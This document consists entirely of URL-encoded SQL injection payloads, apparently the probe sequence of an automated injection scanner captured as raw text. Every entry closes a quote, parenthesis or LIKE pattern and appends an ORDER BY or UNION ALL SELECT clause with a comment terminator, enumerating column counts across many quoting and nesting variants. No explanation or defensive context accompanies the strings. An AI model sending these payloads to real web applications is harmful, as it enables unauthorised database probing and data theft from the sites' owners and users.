-7661%29%20UNION%20ALL%20SELECT%205292%2C5292%2C5292%2C5292%2C5292%2C5292%2C5292--%20 -1185%29%20UNION%20ALL%20SELECT%203009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009--%20 -7117%29%20UNION%20ALL%20SELECT%202185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185--%20 -8115%29%20UNION%20ALL%20SELECT%205841%2C5841%2C5841%2C5841%2C5841%2C5841%2C5841%2C5841%2C5841%2C5841--%20 -7188%27%29%20ORDER%20BY%201--%20 -8725%27%29%20ORDER%20BY%209392--%20 -2367%27%29%20UNION%20ALL%20SELECT%208589--%20 -3020%27%29%20UNION%20ALL%20SELECT%209534%2C9534--%20 -6690%27%29%20UNION%20ALL%20SELECT%203698%2C3698%2C3698--%20 -4394%27%29%20UNION%20ALL%20SELECT%202126%2C2126%2C2126%2C2126--%20 -5928%27%29%20UNION%20ALL%20SELECT%208800%2C8800%2C8800%2C8800%2C8800--%20 -7476%27%29%20UNION%20ALL%20SELECT%208543%2C8543%2C8543%2C8543%2C8543%2C8543--%20 -4803%27%29%20UNION%20ALL%20SELECT%201947%2C1947%2C1947%2C1947%2C1947%2C1947%2C1947--%20 -4697%27%29%20UNION%20ALL%20SELECT%204393%2C4393%2C4393%2C4393%2C4393%2C4393%2C4393%2C4393--%20 -6247%27%29%20UNION%20ALL%20SELECT%204736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736--%20 -8608%27%29%20UNION%20ALL%20SELECT%205805%2C5805%2C5805%2C5805%2C5805%2C5805%2C5805%2C5805%2C5805%2C5805--%20 -6901%27%20ORDER%20BY%201--%20 -9300%27%20ORDER%20BY%204072--%20 -2986%27%20UNION%20ALL%20SELECT%205773--%20 -6461%27%20UNION%20ALL%20SELECT%201221%2C1221--%20 -8787%27%20UNION%20ALL%20SELECT%203475%2C3475%2C3475--%20 -7268%27%20UNION%20ALL%20SELECT%204009%2C4009%2C4009%2C4009--%20 -5901%27%20UNION%20ALL%20SELECT%202604%2C2604%2C2604%2C2604%2C2604--%20 -5183%27%20UNION%20ALL%20SELECT%208853%2C8853%2C8853%2C8853%2C8853%2C8853--%20 -3229%27%20UNION%20ALL%20SELECT%204100%2C4100%2C4100%2C4100%2C4100%2C4100%2C4100--%20 -8650%27%20UNION%20ALL%20SELECT%203606%2C3606%2C3606%2C3606%2C3606%2C3606%2C3606%2C3606--%20 -5413%27%20UNION%20ALL%20SELECT%207896%2C7896%2C7896%2C7896%2C7896%2C7896%2C7896%2C7896%2C7896--%20 -4064%27%20UNION%20ALL%20SELECT%209641%2C9641%2C9641%2C9641%2C9641%2C9641%2C9641%2C9641%2C9641%2C9641--%20 -5839%22%20ORDER%20BY%201--%20 -2440%22%20ORDER%20BY%204718--%20 -6604%22%20UNION%20ALL%20SELECT%205922--%20 -8288%22%20UNION%20ALL%20SELECT%203610%2C3610--%20 -1233%22%20UNION%20ALL%20SELECT%205848%2C5848%2C5848--%20 -3759%22%20UNION%20ALL%20SELECT%201605%2C1605%2C1605%2C1605--%20 -6940%22%20UNION%20ALL%20SELECT%208692%2C8692%2C8692%2C8692%2C8692--%20 -9891%22%20UNION%20ALL%20SELECT%204534%2C4534%2C4534%2C4534%2C4534%2C4534--%20 -4055%22%20UNION%20ALL%20SELECT%206688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688--%20 -1178%22%20UNION%20ALL%20SELECT%204916%2C4916%2C4916%2C4916%2C4916%2C4916%2C4916%2C4916--%20 -6018%22%20UNION%20ALL%20SELECT%209134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134--%20 -4208%22%20UNION%20ALL%20SELECT%208510%2C8510%2C8510%2C8510%2C8510%2C8510%2C8510%2C8510%2C8510%2C8510--%20 -6871%29%20ORDER%20BY%201--%20 -3226%29%20ORDER%20BY%207088--%20 -7334%29%20UNION%20ALL%20SELECT%201902--%20 -1461%29%20UNION%20ALL%20SELECT%206452%2C6452--%20 -7495%29%20UNION%20ALL%20SELECT%207927%2C7927%2C7927--%20 -1023%29%20UNION%20ALL%20SELECT%207109%2C7109%2C7109%2C7109--%20 -6261%29%20UNION%20ALL%20SELECT%202596%2C2596%2C2596%2C2596%2C2596--%20 -6454%29%20UNION%20ALL%20SELECT%204812%2C4812%2C4812%2C4812%2C4812%2C4812--%20 -3266%29%20UNION%20ALL%20SELECT%203886%2C3886%2C3886%2C3886%2C3886%2C3886%2C3886--%20 -7934%29%20UNION%20ALL%20SELECT%208062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062--%20 -3508%29%20UNION%20ALL%20SELECT%208781%2C8781%2C8781%2C8781%2C8781%2C8781%2C8781%2C8781%2C8781--%20 -6021%29%20UNION%20ALL%20SELECT%202427%2C2427%2C2427%2C2427%2C2427%2C2427%2C2427%2C2427%2C2427%2C2427--%20 -3804%29%29%20ORDER%20BY%201--%20 -4033%29%29%20ORDER%20BY%206041--%20 -9621%29%29%20UNION%20ALL%20SELECT%201854--%20 -6095%29%29%20UNION%20ALL%20SELECT%207733%2C7733--%20 -5401%29%29%20UNION%20ALL%20SELECT%208123%2C8123%2C8123--%20 -3955%29%29%20UNION%20ALL%20SELECT%207421%2C7421%2C7421%2C7421--%20 -5577%29%29%20UNION%20ALL%20SELECT%206015%2C6015%2C6015%2C6015%2C6015--%20 -6791%29%29%20UNION%20ALL%20SELECT%206775%2C6775%2C6775%2C6775%2C6775%2C6775--%20 -8865%29%29%20UNION%20ALL%20SELECT%206189%2C6189%2C6189%2C6189%2C6189%2C6189%2C6189--%20 -8733%29%29%20UNION%20ALL%20SELECT%209538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538--%20 -1242%29%29%20UNION%20ALL%20SELECT%204664%2C4664%2C4664%2C4664%2C4664%2C4664%2C4664%2C4664%2C4664--%20 -7120%29%29%20UNION%20ALL%20SELECT%204109%2C4109%2C4109%2C4109%2C4109%2C4109%2C4109%2C4109%2C4109%2C4109--%20 -3558%29%29%29%20ORDER%20BY%201--%20 -3455%29%29%29%20ORDER%20BY%205329--%20 -4290%29%29%29%20UNION%20ALL%20SELECT%201055--%20 -2106%29%29%29%20UNION%20ALL%20SELECT%206334%2C6334--%20 -2398%29%29%29%20UNION%20ALL%20SELECT%202449%2C2449%2C2449--%20 -3946%29%29%29%20UNION%20ALL%20SELECT%206095%2C6095%2C6095%2C6095--%20 -2452%29%29%29%20UNION%20ALL%20SELECT%203047%2C3047%2C3047%2C3047%2C3047--%20 -8293%29%29%29%20UNION%20ALL%20SELECT%207057%2C7057%2C7057%2C7057%2C7057%2C7057--%20 -9605%29%29%29%20UNION%20ALL%20SELECT%205810%2C5810%2C5810%2C5810%2C5810%2C5810%2C5810--%20 -4210%29%29%29%20UNION%20ALL%20SELECT%205854%2C5854%2C5854%2C5854%2C5854%2C5854%2C5854%2C5854--%20 -5198%29%29%29%20UNION%20ALL%20SELECT%208866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866--%20 -1530%29%29%29%20UNION%20ALL%20SELECT%208401%2C8401%2C8401%2C8401%2C8401%2C8401%2C8401%2C8401%2C8401%2C8401--%20 -4801%20ORDER%20BY%201--%20 -6547%20ORDER%20BY%208922--%20 -9320%20UNION%20ALL%20SELECT%206751--%20 -4959%20UNION%20ALL%20SELECT%207823%2C7823--%20 -6222%20UNION%20ALL%20SELECT%201227%2C1227%2C1227--%20 -7491%20UNION%20ALL%20SELECT%204961%2C4961%2C4961%2C4961--%20 -9182%20UNION%20ALL%20SELECT%205603%2C5603%2C5603%2C5603%2C5603--%20 -8442%20UNION%20ALL%20SELECT%204991%2C4991%2C4991%2C4991%2C4991%2C4991--%20 -3373%20UNION%20ALL%20SELECT%209825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825--%20 -9593%20UNION%20ALL%20SELECT%205321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321--%20 -7672%20UNION%20ALL%20SELECT%202732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732--%20 -2544%20UNION%20ALL%20SELECT%209391%2C9391%2C9391%2C9391%2C9391%2C9391%2C9391%2C9391%2C9391%2C9391--%20 -9346%27%29%20ORDER%20BY%201--%20 -1396%27%29%20ORDER%20BY%201113--%20 -3185%27%29%20UNION%20ALL%20SELECT%208912--%20 -6331%27%29%20UNION%20ALL%20SELECT%207151%2C7151--%20 -2482%27%29%20UNION%20ALL%20SELECT%208795%2C8795%2C8795--%20 -1006%27%29%20UNION%20ALL%20SELECT%208332%2C8332%2C8332%2C8332--%20 -1024%27%29%20UNION%20ALL%20SELECT%205957%2C5957%2C5957%2C5957%2C5957--%20 -5822%27%29%20UNION%20ALL%20SELECT%206325%2C6325%2C6325%2C6325%2C6325%2C6325--%20 -1447%27%29%20UNION%20ALL%20SELECT%202813%2C2813%2C2813%2C2813%2C2813%2C2813%2C2813--%20 -5704%27%29%20UNION%20ALL%20SELECT%204834%2C4834%2C4834%2C4834%2C4834%2C4834%2C4834%2C4834--%20 -4428%27%29%20UNION%20ALL%20SELECT%201834%2C1834%2C1834%2C1834%2C1834%2C1834%2C1834%2C1834%2C1834--%20 -4256%27%29%20UNION%20ALL%20SELECT%206566%2C6566%2C6566%2C6566%2C6566%2C6566%2C6566%2C6566%2C6566%2C6566--%20 -5802%27%29%29%20ORDER%20BY%201--%20 -9421%27%29%29%20ORDER%20BY%209255--%20 -9387%27%29%29%20UNION%20ALL%20SELECT%206652--%20 -6065%27%29%29%20UNION%20ALL%20SELECT%207257%2C7257--%20 -8030%27%29%29%20UNION%20ALL%20SELECT%203418%2C3418%2C3418--%20 -8947%27%29%29%20UNION%20ALL%20SELECT%208344%2C8344%2C8344%2C8344--%20 -1414%27%29%29%20UNION%20ALL%20SELECT%202787%2C2787%2C2787%2C2787%2C2787--%20 -5708%27%29%29%20UNION%20ALL%20SELECT%209730%2C9730%2C9730%2C9730%2C9730%2C9730--%20 -7180%27%29%29%20UNION%20ALL%20SELECT%205697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697--%20 -8848%27%29%29%20UNION%20ALL%20SELECT%209336%2C9336%2C9336%2C9336%2C9336%2C9336%2C9336%2C9336--%20 -3480%27%29%29%20UNION%20ALL%20SELECT%209226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226%2C9226--%20 -8644%27%29%29%20UNION%20ALL%20SELECT%201887%2C1887%2C1887%2C1887%2C1887%2C1887%2C1887%2C1887%2C1887%2C1887--%20 -6857%27%29%29%29%20ORDER%20BY%201--%20 -9399%27%29%29%29%20ORDER%20BY%202607--%20 -9476%27%29%29%29%20UNION%20ALL%20SELECT%204878--%20 -8174%27%29%29%29%20UNION%20ALL%20SELECT%209948%2C9948--%20 -4608%27%29%29%29%20UNION%20ALL%20SELECT%209151%2C9151%2C9151--%20 -7888%27%29%29%29%20UNION%20ALL%20SELECT%209180%2C9180%2C9180%2C9180--%20 -5019%27%29%29%29%20UNION%20ALL%20SELECT%201081%2C1081%2C1081%2C1081%2C1081--%20 -6589%27%29%29%29%20UNION%20ALL%20SELECT%208301%2C8301%2C8301%2C8301%2C8301%2C8301--%20 -3660%27%29%29%29%20UNION%20ALL%20SELECT%203663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663--%20 -9847%27%29%29%29%20UNION%20ALL%20SELECT%209925%2C9925%2C9925%2C9925%2C9925%2C9925%2C9925%2C9925--%20 -9203%27%29%29%29%20UNION%20ALL%20SELECT%203745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745--%20 -4154%27%29%29%29%20UNION%20ALL%20SELECT%206243%2C6243%2C6243%2C6243%2C6243%2C6243%2C6243%2C6243%2C6243%2C6243--%20 -4008%27%20ORDER%20BY%201--%20 -6216%27%20ORDER%20BY%202426--%20 -4591%27%20UNION%20ALL%20SELECT%209594--%20 -8890%27%20UNION%20ALL%20SELECT%204826%2C4826--%20 -9866%27%20UNION%20ALL%20SELECT%207584%2C7584%2C7584--%20 -6419%27%20UNION%20ALL%20SELECT%202422%2C2422%2C2422%2C2422--%20 -6890%27%20UNION%20ALL%20SELECT%203334%2C3334%2C3334%2C3334%2C3334--%20 -5222%27%20UNION%20ALL%20SELECT%209652%2C9652%2C9652%2C9652%2C9652%2C9652--%20 -4324%27%20UNION%20ALL%20SELECT%201555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555--%20 -5239%27%20UNION%20ALL%20SELECT%203966%2C3966%2C3966%2C3966%2C3966%2C3966%2C3966%2C3966--%20 -7915%27%20UNION%20ALL%20SELECT%203820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820--%20 -4289%27%20UNION%20ALL%20SELECT%208451%2C8451%2C8451%2C8451%2C8451%2C8451%2C8451%2C8451%2C8451%2C8451--%20 -3193%27%29%20ORDER%20BY%201--%20 -2378%27%29%20ORDER%20BY%201057--%20 -9757%27%29%20UNION%20ALL%20SELECT%207154--%20 -9160%27%29%20UNION%20ALL%20SELECT%202010%2C2010--%20 -7054%27%29%20UNION%20ALL%20SELECT%207462%2C7462%2C7462--%20 -5690%27%29%20UNION%20ALL%20SELECT%205646%2C5646%2C5646%2C5646--%20 -3433%27%29%20UNION%20ALL%20SELECT%202069%2C2069%2C2069%2C2069%2C2069--%20 -5280%27%29%20UNION%20ALL%20SELECT%206891%2C6891%2C6891%2C6891%2C6891%2C6891--%20 -6509%27%29%20UNION%20ALL%20SELECT%206037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037--%20 -3698%27%29%20UNION%20ALL%20SELECT%208362%2C8362%2C8362%2C8362%2C8362%2C8362%2C8362%2C8362--%20 -5495%27%29%20UNION%20ALL%20SELECT%201773%2C1773%2C1773%2C1773%2C1773%2C1773%2C1773%2C1773%2C1773--%20 -6444%27%29%20UNION%20ALL%20SELECT%203905%2C3905%2C3905%2C3905%2C3905%2C3905%2C3905%2C3905%2C3905%2C3905--%20 -9904%27%29%29%20ORDER%20BY%201--%20 -7231%27%29%29%20ORDER%20BY%207027--%20 -7195%27%29%29%20UNION%20ALL%20SELECT%209805--%20 -9142%27%29%29%20UNION%20ALL%20SELECT%207917%2C7917--%20 -2155%27%29%29%20UNION%20ALL%20SELECT%206550%2C6550%2C6550--%20 -8677%27%29%29%20UNION%20ALL%20SELECT%204343%2C4343%2C4343%2C4343--%20 -5453%27%29%29%20UNION%20ALL%20SELECT%203501%2C3501%2C3501%2C3501%2C3501--%20 -2451%27%29%29%20UNION%20ALL%20SELECT%203751%2C3751%2C3751%2C3751%2C3751%2C3751--%20 -7835%27%29%29%20UNION%20ALL%20SELECT%206674%2C6674%2C6674%2C6674%2C6674%2C6674%2C6674--%20 -3622%27%29%29%20UNION%20ALL%20SELECT%208588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588--%20 -3324%27%29%29%20UNION%20ALL%20SELECT%202845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845--%20 -1879%27%29%29%20UNION%20ALL%20SELECT%207542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542--%20 -2897%27%29%29%29%20ORDER%20BY%201--%20 -4429%27%29%29%29%20ORDER%20BY%207671--%20 -4006%27%29%29%29%20UNION%20ALL%20SELECT%204084--%20 -7570%27%29%29%29%20UNION%20ALL%20SELECT%206749%2C6749--%20 -7095%27%29%29%29%20UNION%20ALL%20SELECT%207998%2C7998%2C7998--%20 -2676%27%29%29%29%20UNION%20ALL%20SELECT%209834%2C9834%2C9834%2C9834--%20 -5004%27%29%29%29%20UNION%20ALL%20SELECT%207182%2C7182%2C7182%2C7182%2C7182--%20 -1809%27%29%29%29%20UNION%20ALL%20SELECT%202398%2C2398%2C2398%2C2398%2C2398%2C2398--%20 -7515%27%29%29%29%20UNION%20ALL%20SELECT%201322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322--%20 -1466%27%29%29%29%20UNION%20ALL%20SELECT%205241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241--%20 -7730%27%29%29%29%20UNION%20ALL%20SELECT%205336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336--%20 -3597%27%29%29%29%20UNION%20ALL%20SELECT%208694%2C8694%2C8694%2C8694%2C8694%2C8694%2C8694%2C8694%2C8694%2C8694--%20 -7977%27%20ORDER%20BY%201--%20 -8518%27%20ORDER%20BY%202295--%20 -9664%27%20UNION%20ALL%20SELECT%206661--%20 -9077%27%20UNION%20ALL%20SELECT%208344%2C8344--%20 -8074%27%20UNION%20ALL%20SELECT%208266%2C8266%2C8266--%20 -3501%27%20UNION%20ALL%20SELECT%202559%2C2559%2C2559%2C2559--%20 -5417%27%20UNION%20ALL%20SELECT%204479%2C4479%2C4479%2C4479%2C4479--%20 -4790%27%20UNION%20ALL%20SELECT%207935%2C7935%2C7935%2C7935%2C7935%2C7935--%20 -2743%27%20UNION%20ALL%20SELECT%203720%2C3720%2C3720%2C3720%2C3720%2C3720%2C3720--%20 -7352%27%20UNION%20ALL%20SELECT%205223%2C5223%2C5223%2C5223%2C5223%2C5223%2C5223%2C5223--%20 -5267%27%20UNION%20ALL%20SELECT%205023%2C5023%2C5023%2C5023%2C5023%2C5023%2C5023%2C5023%2C5023--%20 -8255%27%20UNION%20ALL%20SELECT%208654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654--%20 -5533%22%29%20ORDER%20BY%201--%20 -9784%22%29%20ORDER%20BY%203164--%20 -7390%22%29%20UNION%20ALL%20SELECT%204631--%20 -5137%22%29%20UNION%20ALL%20SELECT%201066%2C1066--%20 -4526%22%29%20UNION%20ALL%20SELECT%202688%2C2688%2C2688--%20 -1104%22%29%20UNION%20ALL%20SELECT%209278%2C9278%2C9278%2C9278--%20 -2242%22%29%20UNION%20ALL%20SELECT%208641%2C8641%2C8641%2C8641%2C8641--%20 -6787%22%29%20UNION%20ALL%20SELECT%201009%2C1009%2C1009%2C1009%2C1009%2C1009--%20 -9125%22%29%20UNION%20ALL%20SELECT%201090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090--%20 -1735%22%29%20UNION%20ALL%20SELECT%207978%2C7978%2C7978%2C7978%2C7978%2C7978%2C7978%2C7978--%20 -8030%22%29%20UNION%20ALL%20SELECT%205434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434--%20 -4140%22%29%20UNION%20ALL%20SELECT%209326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326--%20 -7436%22%29%29%20ORDER%20BY%201--%20 -7151%22%29%29%20ORDER%20BY%207040--%20 -6242%22%29%29%20UNION%20ALL%20SELECT%203154--%20 -4930%22%29%29%20UNION%20ALL%20SELECT%208791%2C8791--%20 -7345%22%29%29%20UNION%20ALL%20SELECT%206825%2C6825%2C6825--%20 -3119%22%29%29%20UNION%20ALL%20SELECT%208085%2C8085%2C8085%2C8085--%20 -2255%22%29%29%20UNION%20ALL%20SELECT%202516%2C2516%2C2516%2C2516%2C2516--%20 -3402%22%29%29%20UNION%20ALL%20SELECT%203423%2C3423%2C3423%2C3423%2C3423%2C3423--%20 -4042%22%29%29%20UNION%20ALL%20SELECT%201645%2C1645%2C1645%2C1645%2C1645%2C1645%2C1645--%20 -8136%22%29%29%20UNION%20ALL%20SELECT%201692%2C1692%2C1692%2C1692%2C1692%2C1692%2C1692%2C1692--%20 -6164%22%29%29%20UNION%20ALL%20SELECT%202134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134--%20 -6365%22%29%29%20UNION%20ALL%20SELECT%207963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963--%20 -2142%22%29%29%29%20ORDER%20BY%201--%20 -6146%22%29%29%29%20ORDER%20BY%203691--%20 -8629%22%29%29%29%20UNION%20ALL%20SELECT%208362--%20 -1524%22%29%29%29%20UNION%20ALL%20SELECT%202630%2C2630--%20 -2372%22%29%29%29%20UNION%20ALL%20SELECT%209606%2C9606%2C9606--%20 -8157%22%29%29%29%20UNION%20ALL%20SELECT%208379%2C8379%2C8379%2C8379--%20 -8722%22%29%29%29%20UNION%20ALL%20SELECT%202697%2C2697%2C2697%2C2697%2C2697--%20 -2229%22%29%29%29%20UNION%20ALL%20SELECT%202235%2C2235%2C2235%2C2235%2C2235%2C2235--%20 -3742%22%29%29%29%20UNION%20ALL%20SELECT%204754%2C4754%2C4754%2C4754%2C4754%2C4754%2C4754--%20 -7851%22%29%29%29%20UNION%20ALL%20SELECT%201551%2C1551%2C1551%2C1551%2C1551%2C1551%2C1551%2C1551--%20 -7923%22%29%29%29%20UNION%20ALL%20SELECT%205934%2C5934%2C5934%2C5934%2C5934%2C5934%2C5934%2C5934%2C5934--%20 -6137%22%29%29%29%20UNION%20ALL%20SELECT%203648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648--%20 -1400%22%20ORDER%20BY%201--%20 -5068%22%20ORDER%20BY%202855--%20 -1018%22%20UNION%20ALL%20SELECT%207304--%20 -9536%22%20UNION%20ALL%20SELECT%207663%2C7663--%20 -9194%22%20UNION%20ALL%20SELECT%209108%2C9108%2C9108--%20 -3480%22%20UNION%20ALL%20SELECT%209013%2C9013%2C9013%2C9013--%20 -5848%22%20UNION%20ALL%20SELECT%202688%2C2688%2C2688%2C2688%2C2688--%20 -1266%22%20UNION%20ALL%20SELECT%204746%2C4746%2C4746%2C4746%2C4746%2C4746--%20 -6876%22%20UNION%20ALL%20SELECT%202261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261--%20 -3877%22%20UNION%20ALL%20SELECT%202097%2C2097%2C2097%2C2097%2C2097%2C2097%2C2097%2C2097--%20 -6810%22%20UNION%20ALL%20SELECT%201473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473--%20 -4942%22%20UNION%20ALL%20SELECT%205154%2C5154%2C5154%2C5154%2C5154%2C5154%2C5154%2C5154%2C5154%2C5154--%20 -6180%22%29%20ORDER%20BY%201--%20 -9098%22%29%20ORDER%20BY%201587--%20 -5590%22%29%20UNION%20ALL%20SELECT%209330--%20 -8125%22%29%20UNION%20ALL%20SELECT%206347%2C6347--%20 -8277%22%29%20UNION%20ALL%20SELECT%207291%2C7291%2C7291--%20 -3629%22%29%20UNION%20ALL%20SELECT%203498%2C3498%2C3498%2C3498--%20 -7161%22%29%20UNION%20ALL%20SELECT%203082%2C3082%2C3082%2C3082%2C3082--%20 -3660%22%29%20UNION%20ALL%20SELECT%209636%2C9636%2C9636%2C9636%2C9636%2C9636--%20 -2295%22%29%20UNION%20ALL%20SELECT%207580%2C7580%2C7580%2C7580%2C7580%2C7580%2C7580--%20 -9347%22%29%20UNION%20ALL%20SELECT%201630%2C1630%2C1630%2C1630%2C1630%2C1630%2C1630%2C1630--%20 -8901%22%29%20UNION%20ALL%20SELECT%206450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450--%20 -4686%22%29%20UNION%20ALL%20SELECT%205837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837--%20 -1010%22%29%29%20ORDER%20BY%201--%20 -9350%22%29%29%20ORDER%20BY%201110--%20 -6000%22%29%29%20UNION%20ALL%20SELECT%204249--%20 -7048%22%29%29%20UNION%20ALL%20SELECT%205052%2C5052--%20 -5360%22%29%29%20UNION%20ALL%20SELECT%202164%2C2164%2C2164--%20 -9319%22%29%29%20UNION%20ALL%20SELECT%208396%2C8396%2C8396%2C8396--%20 -1495%22%29%29%20UNION%20ALL%20SELECT%207350%2C7350%2C7350%2C7350%2C7350--%20 -5383%22%29%29%20UNION%20ALL%20SELECT%204737%2C4737%2C4737%2C4737%2C4737%2C4737--%20 -7325%22%29%29%20UNION%20ALL%20SELECT%202798%2C2798%2C2798%2C2798%2C2798%2C2798%2C2798--%20 -5450%22%29%29%20UNION%20ALL%20SELECT%209072%2C9072%2C9072%2C9072%2C9072%2C9072%2C9072%2C9072--%20 -3026%22%29%29%20UNION%20ALL%20SELECT%209743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743--%20 -1113%22%29%29%20UNION%20ALL%20SELECT%206137%2C6137%2C6137%2C6137%2C6137%2C6137%2C6137%2C6137%2C6137%2C6137--%20 -8236%22%29%29%29%20ORDER%20BY%201--%20 -9265%22%29%29%29%20ORDER%20BY%208044--%20 -4781%22%29%29%29%20UNION%20ALL%20SELECT%207380--%20 -6751%22%29%29%29%20UNION%20ALL%20SELECT%201359%2C1359--%20 -5889%22%29%29%29%20UNION%20ALL%20SELECT%205628%2C5628%2C5628--%20 -2263%22%29%29%29%20UNION%20ALL%20SELECT%208602%2C8602%2C8602%2C8602--%20 -1485%22%29%29%29%20UNION%20ALL%20SELECT%208764%2C8764%2C8764%2C8764%2C8764--%20 -4656%22%29%29%29%20UNION%20ALL%20SELECT%203745%2C3745%2C3745%2C3745%2C3745%2C3745--%20 -3097%22%29%29%29%20UNION%20ALL%20SELECT%205692%2C5692%2C5692%2C5692%2C5692%2C5692%2C5692--%20 -4455%22%29%29%29%20UNION%20ALL%20SELECT%201064%2C1064%2C1064%2C1064%2C1064%2C1064%2C1064%2C1064--%20 -8439%22%29%29%29%20UNION%20ALL%20SELECT%204217%2C4217%2C4217%2C4217%2C4217%2C4217%2C4217%2C4217%2C4217--%20 -8299%22%29%29%29%20UNION%20ALL%20SELECT%204157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157--%20 -5470%22%20ORDER%20BY%201--%20 -6254%22%20ORDER%20BY%207190--%20 -4804%22%20UNION%20ALL%20SELECT%209280--%20 -9056%22%20UNION%20ALL%20SELECT%207293%2C7293--%20 -1001%22%20UNION%20ALL%20SELECT%202011%2C2011%2C2011--%20 -9208%22%20UNION%20ALL%20SELECT%206574%2C6574%2C6574%2C6574--%20 -4984%22%20UNION%20ALL%20SELECT%205351%2C5351%2C5351%2C5351%2C5351--%20 -5080%22%20UNION%20ALL%20SELECT%209759%2C9759%2C9759%2C9759%2C9759%2C9759--%20 -3741%22%20UNION%20ALL%20SELECT%201540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540--%20 -6703%22%20UNION%20ALL%20SELECT%209678%2C9678%2C9678%2C9678%2C9678%2C9678%2C9678%2C9678--%20 -9169%22%20UNION%20ALL%20SELECT%207482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482--%20 -4382%22%20UNION%20ALL%20SELECT%207752%2C7752%2C7752%2C7752%2C7752%2C7752%2C7752%2C7752%2C7752%2C7752--%20 -6080%25%27%29%20ORDER%20BY%201--%20 -2221%25%27%29%20ORDER%20BY%204718--%20 -7013%25%27%29%20UNION%20ALL%20SELECT%203772--%20 -2370%25%27%29%20UNION%20ALL%20SELECT%209775%2C9775--%20 -8836%25%27%29%20UNION%20ALL%20SELECT%206654%2C6654%2C6654--%20 -9946%25%27%29%20UNION%20ALL%20SELECT%206172%2C6172%2C6172%2C6172--%20 -3737%25%27%29%20UNION%20ALL%20SELECT%202410%2C2410%2C2410%2C2410%2C2410--%20 -1772%25%27%29%20UNION%20ALL%20SELECT%202084%2C2084%2C2084%2C2084%2C2084%2C2084--%20 -1726%25%27%29%20UNION%20ALL%20SELECT%203630%2C3630%2C3630%2C3630%2C3630%2C3630%2C3630--%20 -5184%25%27%29%20UNION%20ALL%20SELECT%206904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904--%20 -6756%25%27%29%20UNION%20ALL%20SELECT%203477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477--%20 -2242%25%27%29%20UNION%20ALL%20SELECT%203232%2C3232%2C3232%2C3232%2C3232%2C3232%2C3232%2C3232%2C3232%2C3232--%20 -4500%25%27%29%29%20ORDER%20BY%201--%20 -3558%25%27%29%29%20ORDER%20BY%202203--%20 -1321%25%27%29%29%20UNION%20ALL%20SELECT%206196--%20 -2863%25%27%29%29%20UNION%20ALL%20SELECT%208375%2C8375--%20 -7593%25%27%29%29%20UNION%20ALL%20SELECT%201025%2C1025%2C1025--%20 -8876%25%27%29%29%20UNION%20ALL%20SELECT%208762%2C8762%2C8762%2C8762--%20 -4506%25%27%29%29%20UNION%20ALL%20SELECT%207621%2C7621%2C7621%2C7621%2C7621--%20 -3554%25%27%29%29%20UNION%20ALL%20SELECT%206077%2C6077%2C6077%2C6077%2C6077%2C6077--%20 -3633%25%27%29%29%20UNION%20ALL%20SELECT%203453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453--%20 -8100%25%27%29%29%20UNION%20ALL%20SELECT%204638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638--%20 -6975%25%27%29%29%20UNION%20ALL%20SELECT%209836%2C9836%2C9836%2C9836%2C9836%2C9836%2C9836%2C9836%2C9836--%20 -5052%25%27%29%29%20UNION%20ALL%20SELECT%201464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464--%20 -8660%25%27%29%29%29%20ORDER%20BY%201--%20 -2608%25%27%29%29%29%20ORDER%20BY%204795--%20 -9083%25%27%29%29%29%20UNION%20ALL%20SELECT%203323--%20 -1431%25%27%29%29%29%20UNION%20ALL%20SELECT%204834%2C4834--%20 -7497%25%27%29%29%29%20UNION%20ALL%20SELECT%203820%2C3820%2C3820--%20 -9027%25%27%29%29%29%20UNION%20ALL%20SELECT%207103%2C7103%2C7103%2C7103--%20 